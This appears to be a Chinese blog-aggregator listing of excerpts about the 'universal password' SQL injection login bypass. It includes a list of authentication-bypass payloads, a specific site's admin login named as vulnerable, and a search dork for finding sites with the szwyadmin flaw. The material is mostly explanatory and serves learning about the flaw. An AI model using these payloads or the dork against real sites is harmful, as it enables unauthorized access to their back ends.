在登录网站后台时,有一个比较古老的“万能密码”漏洞,即利用一个我们精心构造的用户名,即使不用输入密码,也可以登录后台,其原理仍属于SQL注入的范畴。假设数据库中存放用户信息的表是admin,其中存放用户名的字段是username,存放密码的字段是password,在用户验证页面中..
分类:
Web程序 时间:
2014-10-22 10:13:55
阅读次数:
320
1.Asp/Aspx万能密码:
'or'='or''or 1=1--''or 1=1--'or'a'='a"or "a"="a"or"="a'='a ')or('a'='aor 1=1--a'or' 1=1--"or"="a'='a'or''='1 or '1'='1'=11 or '1'='1' or 1=1'OR 1=1%00"or 1=1%00'xoradmin' or 'a'='...
分类:
其他好文 时间:
2014-09-07 13:34:05
阅读次数:
133
_<当然,万能密码还有很多种,这里就不说了!但是,灵活运用才是最重要!看一个实际的例子!朋友小树前几天看了一个站(http://www.czdh.com.cn/manage/login.asp),可以用万能密码'or'='or'登录,而且后台有数据库备份,但是,可惜的是没有权限,怪哉!一般而言,'o...
分类:
Web程序 时间:
2014-08-25 02:15:33
阅读次数:
381
以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理。今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事。众所周知的万能密码SQL注入漏洞,大家相信很熟悉了。不懂得简单了解下,懂的大牛直接飘过即可。**********************....
分类:
数据库 时间:
2014-08-21 18:42:24
阅读次数:
285
先声明:拿站凭良心,不要瞎搞,逆天只是讲解一个技术,你们要是瞎搞,自己负责,与我无关!补漏洞的时候记得两点:1.你所信任的是否安全;2.能否举一反三看正文:(szwyadmin漏洞:利用cookies和万能密码实现入侵)谷歌:inurl:szwyadmin/login.asp比如我在搜索的网站中选了...
分类:
其他好文 时间:
2014-08-04 01:41:46
阅读次数:
1160